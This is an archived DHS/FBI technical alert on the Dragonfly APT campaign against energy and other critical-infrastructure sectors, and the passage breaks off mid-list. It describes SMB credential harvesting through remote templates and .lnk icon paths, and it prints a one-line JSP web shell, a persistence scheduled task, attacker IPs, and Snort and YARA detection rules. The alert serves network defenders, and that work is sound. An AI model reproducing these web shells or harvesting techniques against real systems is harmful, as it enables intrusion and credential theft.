{ "id": "662bc939-e9c7-408c-aebf-c1547b4ff2f8", "created_at": "2026-04-06T01:31:35.452279Z", "updated_at": "2026-04-10T03:36:24.73966Z", "deleted_at": null, "sha1_hash": "f3426320cabc355f756fd039f450b88f535b5e6f", "title": "Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 160052, "plain_text": "Advanced Persistent Threat Activity Targeting Energy and Other\r\nCritical Infrastructure Sectors | CISA\r\nPublished: 2018-03-15 · Archived: 2026-04-06 01:26:16 UTC\r\nSystems Affected\r\nDomain Controllers\r\nFile Servers\r\nEmail Servers\r\nOverview\r\nThis alert has been superseded by newer information. The old alert is provided below for historical reference only.\r\nFor the newest version, please see TA18-074A.\r\nThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the\r\nFederal Bureau of Investigation (FBI). This alert provides information on advanced persistent threat (APT) actions targeting\r\ngovernment entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. Working\r\nwith U.S. and international partners, DHS and FBI identified victims in these sectors. This report contains indicators of\r\ncompromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on\r\ncompromised victims’ networks.\r\nDHS assesses this activity as a multi-stage intrusion campaign by threat actors targeting low security and small networks to\r\ngain access and move laterally to networks of major, high value asset owners within the energy sector. Based on malware\r\nanalysis and observed IOCs, DHS has confidence that this campaign is still ongoing, and threat actors are actively pursuing\r\ntheir ultimate objectives over a long-term campaign. The intent of this product is to educate network defenders and enable\r\nthem to identify and reduce exposure to malicious activity.\r\nFor a downloadable copy of IOC packages and associated files, see:\r\nTA17-293A_TLP_WHITE.csv\r\nTA17-293A_TLP_WHITE_stix.xml\r\nMIFR-10127623_TLP_WHITE.pdf\r\nMIFR-10127623_TLP_WHITE_stix.xml\r\nMIFR-10128327_TLP_WHITE.pdf\r\nMIFR-10128327_TLP_WHITE_stix.xml\r\nMIFR-10128336_TLP_WHITE.pdf\r\nMIFR-10128336_TLP_WHITE_stix.xml\r\nMIFR-10128830_TLP_WHITE.pdf\r\nMIFR-10128830_TLP_WHITE_stix.xml\r\nMIFR-10128883_TLP_WHITE.pdf\r\nMIFR-10128883_TLP_WHITE_stix.xml\r\nMIFR-10135300_TLP_WHITE.pdf\r\nMIFR-10135300_TLP_WHITE_stix.xml\r\nContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical\r\nassistance.\r\nSince at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical\r\nmanufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims’ networks. Historically,\r\ncyber threat actors have targeted the energy sector with various results, ranging from cyber espionage to the ability to disrupt\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 1 of 15\n\nenergy systems in the event of a hostile conflict. [1] Historically, threat actors have also targeted other critical infrastructure\r\nsectors with similar campaigns.\r\nAnalysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity. Of\r\nspecific note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on\r\nSeptember 6, 2017, provides additional information about this ongoing campaign. [2]\r\nThis campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral\r\norganizations such as trusted third party suppliers with less secure networks. The initial victims are referred to as “staging\r\ntargets” throughout this alert. The threat actor uses the staging targets’ networks as pivot points and malware repositories\r\nwhen targeting their final intended victims. The ultimate objective of the cyber threat actors is to compromise organizational\r\nnetworks, which are referred throughout this alert as “intended target.”\r\nTechnical Details\r\nThe threat actors in this campaign employed a variety of TTPs, including:\r\nopen-source reconnaissance,\r\nspear-phishing emails (from compromised legitimate accounts),\r\nwatering-hole domains,\r\nhost-based exploitation,\r\nindustrial control system (ICS) infrastructure targeting, and\r\nongoing credential gathering.\r\nUsing Cyber Kill Chain for Analysis\r\nDHS leveraged the Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model\r\ninclude reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the\r\nobjective. This section will provide a high-level overview of activity within this framework.\r\nStage 1: Reconnaissance\r\nThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of\r\nopportunity. Staging targets held preexisting relationships with many of the intended targets. It is known that threat actors\r\nare actively accessing publicly available information hosted by organization-monitored networks. DHS further assesses that\r\nthreat actors are seeking to identify information pertaining to network and organizational design, as well as control system\r\ncapabilities, within organizations.\r\nForensic analysis identified that threat actors are conducting open-source reconnaissance of their targets, gathering\r\ninformation posted on company-controlled websites. This is a common tactic for collecting the information needed for\r\ntargeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may\r\nappear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a\r\nsmall photo from a publically accessible human resources page. The image, when expanded, was a high-resolution photo\r\nthat displayed control systems equipment models and status information in the background.\r\nAnalysis also revealed that the threat actors used compromised staging target networks to conduct open-source\r\nreconnaissance to identify potential targets of interest and intended targets. “Targets of interest” refers to organizations that\r\nDHS observed the threat actors showing an active interest in, but where no compromise was reported. Specifically, the threat\r\nactors accessed publically web-based remote access infrastructure such as websites, remote email access portals, and virtual\r\nprivate network (VPN) connections.\r\nStage 2: Weaponization\r\nSpear-Phishing Email TTPs\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 2 of 15\n\nThroughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office\r\nfunctions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this\r\nrequest is: file[:]//\u003cremote IP address\u003e/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this\r\nrequest authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the\r\nrequested file. (Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors\r\nthen likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they\r\nare able to masquerade as authorized users.\r\nStage 3: Delivery\r\nWhen seeking to compromise the target network, threat actors used a spear-phishing email campaign that differed from\r\npreviously reported TTPs. The spear-phishing email used a generic contract agreement theme, with the subject line\r\n“AGREEMENT \u0026 Confidential”, and which contained a generic PDF document, titled “’’document.pdf”. (Note the\r\ninclusion of two single apostrophes at the beginning of the attachment name.) The PDF itself was not malicious and did not\r\ncontain any active code. The document prompted the user to click on a link should a download not automatically begin.\r\n(Note: No code within the PDF initiated a download.) The link directs users to a website via a shortened URL, which may\r\nprompt them to retrieve a malicious file.\r\nIn previous reporting, DHS and FBI identified the common themes used in these spear-phishing emails, all emails referred\r\nto control systems or process control systems. The threat actors continue to use these themes, specifically against intended\r\ntarget organizations. Email messages include references to common industrial control equipment and protocols. The emails\r\nleveraged malicious Microsoft Word attachments that appear to be legitimate résumés or curricula vitae (CVs) for industrial\r\ncontrol systems personnel, as well as invitations and policy documents that entice the user to open the attachment. The list of\r\nfile names has been published in the IOC.\r\nStage 4: Exploitation\r\nThreat actors used distinct and unusual TTPs (i.e., successive redirects) in the phishing campaign directed at staging targets.\r\nEmails contained a stacked URL-shortening link that directed the user to http://bit[.]ly/2m0x8IH link, which redirected the\r\nuser to http://tinyurl[.]com/h3sdqck link, which redirected the user to the ultimate destination of\r\nhttp://imageliners[.]com/nitel. The imageliner[.]com website contained an email address and password input fields\r\nmimicking a login page for a website.\r\nWhen exploiting the intended targets, threat actors used malicious .docx files to capture user credentials, however, DHS did\r\nnot observe the actors establishing persistence on the user’s system. The documents attempt to retrieve a file through a\r\n“file:\\\\” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139 and User Datagram Protocol\r\n(UDP) ports 137 or 138. This connection is made to a command and control (C2) server — either a server owned by the\r\nthreat actors or that of a compromised system owned by a staging location victim. When a user is authenticated as a domain\r\nuser, this will provide the C2 server with the hash of the victim. Local users will receive a graphical user interface (GUI)\r\nprompt to enter a username and password. This information will be provided to the C2 over TCP ports 445 or 139 and UDP\r\nports 137 or 138. (Note: A file transfer is not necessary for a loss of credential information.) Symantec’s report associates\r\nthis behavior to the Dragonfly threat actors in this campaign. [3]\r\nUse of Watering Hole Domains\r\nOne of the threat actors’ primary uses for staging targets is to develop watering holes. The threat actors compromise the\r\ninfrastructure of trusted organizations to reach intended targets. [4] Although these watering holes may host legitimate\r\ncontent by reputable organizations, the threat actors have altered them to contain and reference malicious content.\r\nApproximately half of the known watering holes are trade publications and informational websites related to process\r\ncontrol, ICS, or critical infrastructure.\r\nUsing a similar SMB collection technique, the actors manipulated these websites by altering JavaScript and PHP files that\r\nredirect to an IP address on port 445 for credential harvesting. The compromised sites include both custom developed web\r\napplications and template-based frameworks. The threat actors injected a line of code into header.php, a legitimate PHP file\r\nthat carried out the redirected traffic.\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 3 of 15\n\nThere is no indication that threat actors used zero-day exploits to manipulate the sites; the threat actors more likely used\r\nlegitimate credentials to access the website content directly.\r\nStage 5: Installation\r\nThe threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication is not\r\nused. [5] Once inside of an intended target’s network, the threat actors downloaded tools from a remote server. The initial\r\nversions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.\r\nIn one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following\r\nactions:\r\nThe threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.\r\nThe files were renamed to new extensions, with INST.txt being renamed INST.exe.\r\nThe files were executed on the host and then immediately deleted.\r\nThe execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running\r\nprocess list of a compromised system of an intended target.\r\nIn their report on Dragonfly, Symantec associated the MD5 hash of INST.exe to Backdoor.Goodor. The MD5 hashes for the\r\npreviously mentioned files can be found in the IOC list above.\r\nSeveral of these files were scripts that were used for creating the initial account leveraged by the threat actors. The initial\r\nscript symantec_help.jsp contained a one-line reference to a malicious script. It was located at C:\\Program Files\r\n(x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\webapps\\ROOT\\.\r\nContents of symantec_help.jsp\r\n______________________________________________________________________________________________________________\r\n\u003c% Runtime.getRuntime().exec(\"cmd /C \\\"\" + System.getProperty(\"user.dir\") + \"\\\\..\\\\webapps\\\\ROOT\\\\\u003cREDACTED\r\nSCRIPT NAME\u003e\\\"\"); %\u003e\r\n______________________________________________________________________________________________________________\r\nThe malicious script created a user account, disabled the host-based firewall, and globally opened port 3389 for Remote\r\nDesktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group for\r\nelevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German,\r\nFrench, and English.\r\nIn addition, the threat actors also created a scheduled task “reset”, which was designed to automatically log out of their\r\nnewly created account every eight hours.\r\nContents of Scheduled Task\r\n______________________________________________________________________________________________________________\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n  \u003cDate\u003e2017-06-25T11:51:17.4848488\u003c/Date\u003e\r\n  \u003cAuthor\u003e\u003cREDACTED\u003e\u003c/Author\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 4 of 15\n\n\u003cTimeTrigger\u003e\r\n   \u003cStartBoundary\u003e2017-06-25T12:30:29\u003c/StartBoundary\u003e\r\n   \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n  \u003c/TimeTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n  \u003cPrincipal id=\"Author\"\u003e\r\n   \u003cRunLevel\u003eLeastPrivilege\u003c/RunLevel\u003e\r\n   \u003cUserId\u003e\u003cREDACTED USERNAME\u003e\u003c/UserId\u003e\r\n   \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n  \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n  \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n  \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\r\n  \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\r\n  \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\r\n  \u003cStartWhenAvailable\u003efalse\u003c/StartWhenAvailable\u003e\r\n  \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n  \u003cIdleSettings\u003e\r\n   \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n   \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n  \u003c/IdleSettings\u003e\r\n  \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n  \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n  \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n  \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n  \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n  \u003cExecutionTimeLimit\u003eP3D\u003c/ExecutionTimeLimit\u003e\r\n  \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 5 of 15\n\n\u003cExec\u003e\r\n   \u003cCommand\u003elogoff\u003c/Command\u003e\r\n  \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\n______________________________________________________________________________________________________________\r\nAfter achieving access to staging targets, the threat actors installed tools to carry out their mission. On one occasion, threat\r\nactors installed the free version of Forticlient, which was presumably used as a VPN client for intended targets.\r\nConsistent with the perceived goal of credential harvesting, the threat actor was observed dropping and executing open\r\nsource and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations\r\nsuggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis\r\nindicates that many of these tools were executed during the timeframe in which the threat actor was accessing the system. Of\r\nnote, the threat actor installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at\r\nC:\\Users\\\u003cRedacted Username\u003e\\Desktop\\OWAExchange\\. In the previous folder structure, a subfolder named “out” held\r\nmultiple text files.\r\nPersistence Through .LNK File Manipulation\r\nThe threat actors manipulated .lnk files to repeatedly gather user credentials. Default Windows functionality enables icons to\r\nbe loaded from a local Windows repository. The threat actors exploited this built-in Windows functionality by setting the\r\nicon path to their remote controlled server. When the user browses to the directory, Windows attempts to load the icon and\r\ninitiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted\r\nSMB connection. The threat actors used this tactic in both Virtual Desktop Infrastructure (VDI) and traditional\r\nenvironments.\r\nThree of the observed .lnk files were SETROUTE.lnk, notepad.exe.lnk, and Document.lnk. These names appear to be\r\ncontextual, and threat actors may use a variety of other file names within this tactic. Two of the remote servers observed in\r\nthese .lnk files were 62.8.193[.]206 and 5.153.58[.]45.\r\nEstablishing Local Accounts\r\nThe threat actors created accounts on the staging target for ongoing operations. These accounts, masquerading as legitimate\r\nservice accounts, appeared to be tailored to each individual staging target. Each account created by the threat actors served a\r\nspecific purpose in their operation. DHS and FBI identified the creation of four local accounts on a compromised server. The\r\nserver operated as both a domain controller and an email server for a staging target.\r\nAccount 1: The threat actors created a local account, which was named to mimic backup services of the staging target. This\r\naccount was created by the aforementioned malicious script. The threat actors used this account to conduct open-source\r\nreconnaissance and remotely access intended targets. This account was also used to remove the Forticlient software.\r\nAccount 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed\r\naction was to create Account 3.\r\nAccount 3: The threat actors created Account 3 in the staging victim’s Microsoft Exchange Server. A PowerShell script\r\ncreated this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions\r\nof the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last\r\nname).\r\nAccount 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator\r\naccount. Account 4 was then used to delete the following logs: system, security, terminal services, remote services, and\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 6 of 15\n\naudit. Registry analysis indicated that this activity was likely scripted.\r\nStage 6: Command and Control\r\nThe threat actors commonly use web shells to compromise publically available servers to gain a foothold into internal\r\nnetworks. This activity has been observed on both web and email servers. The threat actors then establish an encrypted\r\nconnection over port 443 to the web shell. Once connected, the threat actors download additional malicious files from the\r\nthreat actors’ servers to the publically available server. Two of the web shells (AutoDiscover.aspx and global.aspx) used by\r\nthe actors are detailed in the accompanying IOC list. Despite having different file names, the MD5 hashes of the two web\r\nshells indicated that the two files were the same file. These web shells have been associated with the ciklon_z webshell.\r\nDHS and FBI identified the threat actors leveraging remote access services and infrastructure, such as VPN, RDP, and\r\nOutlook Web Access (OWA). The threat actors used staging targets to connect to several intended targets, effectively turning\r\nthe staging targets into command and control points. To date, it is presumed that the threat actors have targeted services that\r\nuse single-factor authentication. DHS believes that the threat actors employ this methodology to avoid detection and\r\nattribution.\r\nTargeting of ICS and SCADA Infrastructure\r\nUpon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network.\r\nSpecifically, the threat actors focused on identifying and browsing file servers within the intended victim’s network. The\r\nthreat actors viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. Based on DHS\r\nanalysis of existing compromises, these files were originally named containing ICS vendor names and ICS reference\r\ndocuments pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).\r\nIn one instance, the threat actors accessed workstations and servers on a corporate network that contained data output from\r\ncontrol systems within energy generation facilities. In this same incident, the threat actors created a malicious scheduled task\r\nthat invoked “scr.exe” with the arguments “scr.jpg”. The MD5 hash of scr.exe matched the MD5 of ScreenUtil, a tool used\r\nby the threat actor, as reported in the Symantec Dragonfly 2.0 report.\r\nDetection and Response\r\nIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI\r\nrecommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA\r\nrules provided and add the IPs to their watchlist to determine whether malicious activity has been observed within their\r\norganization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these\r\nAPT actors.\r\nNetwork Signatures and Host-Based Rules\r\nThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with\r\nthreat actors TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting\r\nprocess, the possibility of false positives always remains.\r\nNetwork Signatures\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains\r\n'/aspnet_client/system_web/4_0_30319/update/' (Beacon)\"; sid:42000000; rev:1; flow:established,to_server;\r\ncontent:\"/aspnet_client/system_web/4_0_30319/update/\"; http_uri; fast_pattern:only; classtype:bad-unknown;\r\nmetadata:service http;)\r\n___________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/img/bson021.dat'\";\r\nsid:42000001; rev:1; flow:established,to_server; content:\"/img/bson021.dat\"; http_uri; fast_pattern:only;\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 7 of 15\n\nclasstype:bad-unknown; metadata:service http;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/A56WY' (Callback)\";\r\nsid:42000002; rev:1; flow:established,to_server; content:\"/A56WY\"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp any any -\u003e any 445 (msg:\"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)\";\r\nsid:42000003; rev:1; flow:established,to_server; content:\"|FF|SMB|75 00 00 00 00|\"; offset:4; depth:9;\r\ncontent:\"|08 00 01 00|\"; distance:3; content:\"|00 5c 5c|\"; distance:2; within:3; content:\"|5c|AME_ICON.PNG\";\r\ndistance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI OPTIONS contains '/ame_icon.png' (SMB\r\ncredential harvesting)\"; sid:42000004; rev:1; flow:established,to_server; content:\"/ame_icon.png\"; http_uri;\r\nfast_pattern:only; content:\"OPTIONS\"; nocase; http_method; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'\"; sid:42000005; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip\"; http_header; fast_pattern:only; pcre:\"/\\.(?:aspx|txt)\\?[a-z0-9]\r\n{3}=[a-z0-9]{32}\u0026/U\"; classtype:bad-unknown; metadata:service http;)\r\n__________________________________________\r\nalert tcp $EXTERNAL_NET [139,445] -\u003e $HOME_NET any (msg:\"SMB Server Traffic contains NTLM-Authenticated SMBv1\r\nSession\"; sid:42000006; rev:1; flow:established,to_client; content:\"|ff 53 4d 42 72 00 00 00 00 80|\";\r\nfast_pattern:only; content:\"|05 00|\"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n \r\nYARA Rules\r\nThis is a consolidated rule set for malware associated with, consisting of rules written by US-CERT, as well as contributions\r\nby trusted partners.\r\n*/\r\nrule APT_malware_1\r\n{\r\nmeta:\r\n description = \"inveigh pen testing tools \u0026 related artifacts\"\r\n author = \"US-CERT Code Analysis Team\"\r\n date = \"2017/07/17\"\r\n hash0 = \"61C909D2F625223DB2FB858BBDF42A76\"\r\n hash1 = \"A07AA521E7CAFB360294E56969EDA5D6\"\r\n hash2 = \"BA756DD64C1147515BA2298B6A760260\"\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 8 of 15\n\nhash3 = \"8943E71A8C73B5E343AA9D2E19002373\"\r\nhash4 = \"04738CA02F59A5CD394998A99FCD9613\"\r\n hash5 = \"038A97B4E2F37F34B255F0643E49FC9D\"\r\n hash6 = \"65A1A73253F04354886F375B59550B46\"\r\n hash7 = \"AA905A3508D9309A93AD5C0EC26EBC9B\"\r\n hash8 = \"5DBEF7BDDAF50624E840CCBCE2816594\"\r\n hash9 = \"722154A36F32BA10E98020A8AD758A7A\"\r\n hash10 = \"4595DBE00A538DF127E0079294C87DA0\"\r\nstrings:\r\n $s0 = \"file://\"\r\n $s1 = \"/ame_icon.png\"\r\n $s2 = \"184.154.150.66\"\r\n $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }\r\n $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }\r\n $s5 = \"(g.charCodeAt(c)^l[(l[b]+l[e])%256])\"\r\n $s6 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n $s7 = \"VXNESWJfSjY3grKEkEkRuZeSvkE=\"\r\n $s8 = \"NlZzSZk=\"\r\n $s9 = \"WlJTb1q5kaxqZaRnser3sw==\"\r\n $s10 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n $s11 = \"fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])\"\r\n $s12 = \"ps.exe -accepteula \\\\%ws% -u %user% -p %pass% -s cmd /c netstat\"\r\n $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }\r\n $s14 = {\r\n68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967\r\n}\r\n $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }\r\n//inveigh pentesting tools\r\n $s16 = {\r\n24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65\r\n}\r\n//specific malicious word document PK archive\r\n $s17 = {\r\n2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 9 of 15\n\n$s18 = {\r\n6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B4821\r\n}\r\n $s19 = {\r\n8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }\r\n $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }\r\n $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }\r\n $s22 = \"5.153.58.45\"\r\n $s23 = \"62.8.193.206\"\r\n $s24 = \"/1/ree_stat/p\"\r\n $s25 = \"/icon.png\"\r\n $s26 = \"/pshare1/icon\"\r\n $s27 = \"/notepad.png\"\r\n $s28 = \"/pic.png\"\r\n $s29 = \"http://bit.ly/2m0x8IH\"\r\ncondition:\r\n ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12\r\nand $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or\r\n$s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28)\r\nor ($s29)\r\n}\r\nrule APT_malware_2\r\n{\r\nmeta:\r\n description = \"rule detects malware\"\r\n author = \"other\"\r\nstrings:\r\n $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }\r\n $http_push = \"X-mode: push\" nocase\r\n $http_pop = \"X-mode: pop\" nocase\r\ncondition:\r\n any of them\r\n}\r\nrule Query_XML_Code_MAL_DOC_PT_2\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 10 of 15\n\n{\r\nmeta:\r\n name= \"Query_XML_Code_MAL_DOC_PT_2\"\r\n author = \"other\"\r\n strings:\r\n $zip_magic = { 50 4b 03 04 }\r\n $dir1 = \"word/_rels/settings.xml.rels\"\r\n $bytes = {8c 90 cd 4e eb 30 10 85 d7}\r\n condition:\r\n $zip_magic at 0 and $dir1 and $bytes\r\n}\r\nrule Query_Javascript_Decode_Function\r\n{\r\nmeta:\r\n name= \"Query_Javascript_Decode_Function\"\r\n author = \"other\"\r\nstrings:\r\n $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22\r\n22 29 3B}\r\n $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64\r\n65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E\r\n69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}\r\n $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28\r\n?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29\r\n2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}\r\n $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}\r\n $func_call=\"a(\\\"\"\r\ncondition:\r\n filesize \u003c 20KB and #func_call \u003e 20 and all of ($decode*)\r\n}\r\nrule Query_XML_Code_MAL_DOC\r\n{\r\nmeta:\r\n name= \"Query_XML_Code_MAL_DOC\"\r\nhttps://www.us-cert.gov/ncas/alerts/TA17-293A\r\nPage 11 of 15\n\nauthor = \"other\"\r\nstrings:\r\n $zip_magic = { 50 4b 03 04 }\r\n $dir = \"word/_rels/\" ascii\r\n $dir2 = \"word/theme/theme1.xml\" ascii\r\n $style = \"word/styles.xml\" ascii\r\ncondition:\r\n $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd\r\n}\r\nImpact\r\nThis APT actor’s campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and\r\ncritical manufacturing sectors.\r\nSolution\r\nDHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help\r\ndefend against this activity.\r\nNetwork and Host-based Signatures\r\nDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and\r\nSnort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their\r\norganization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious\r\nactivity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated\r\nYARA and .txt file to identify malicious activity.\r\nDetections and Prevention Measures\r\nUsers and administrators can detect spear phishing, watering hole, web shell, and remote access activity by\r\ncomparing all IP addresses and domain names listed in the IOC packages to the following locations:\r\nnetwork 